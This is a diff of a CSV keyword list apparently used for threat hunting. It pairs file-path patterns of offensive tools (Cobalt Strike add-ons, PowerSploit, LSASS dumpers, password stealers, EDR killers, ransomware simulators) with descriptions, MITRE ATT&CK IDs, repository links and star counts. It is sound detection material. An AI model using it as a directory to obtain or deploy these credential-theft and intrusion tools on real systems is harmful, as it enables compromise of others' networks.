+"*\petitpotam.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\pipe\brutepipe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*\PipeViewer.exe*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z"
 "*\PipeViewer.sln*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z"
@@ -6295,16 +6415,16 @@
 "*\POC_DLL.vcxproj*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z"
 "*\polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
 "*\portbender.*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z"
-"*\PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*\PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*\PostDump.exe*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
-"*\powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*\powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*\powerglot\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
-"*\Powermad*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*\Powermad*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
 "*\power-pwn\*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
-"*\PowershellKerberos*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
-"*\powerup.exe*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\PowershellKerberos*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
+"*\powerup.exe*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
 "*\Powerup.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
-"*\PowerUp.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\PowerUp.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
 "*\PowerView.cna*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
 "*\PowerView.exe*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
 "*\Powerview.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
@@ -6312,70 +6432,78 @@ "*\PowerView3.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","0","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*\ppl_dump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*\PPLBlade-main*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" -"*\PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*\PPLKiller*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*\PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\PPLKiller*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process 
Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*\printnightmare.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\PrintSpoofer.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*\PrintSpoofer-1.0.zip*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*\PrintSpoofer-1.0.zip*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*\PrivEditor\*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*\PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*\PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*\PrivKit\*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" -"*\process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*\procdump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected 
Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*\ProduKey.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\ProgramData\asrephashes.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\ProgramData\shares.txt*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\ProgramData\shares.txt*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\ps2exe.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*\PS2EXE\*.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*\PsExecLog.log*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" -"*\PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*\PSPY.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\PSPY.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*\PSRansom -*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" "*\Public\dcapi.dll*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\public\klogging.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*\Public\Music\RDPCreds.txt*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*\pwn.exe*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - 
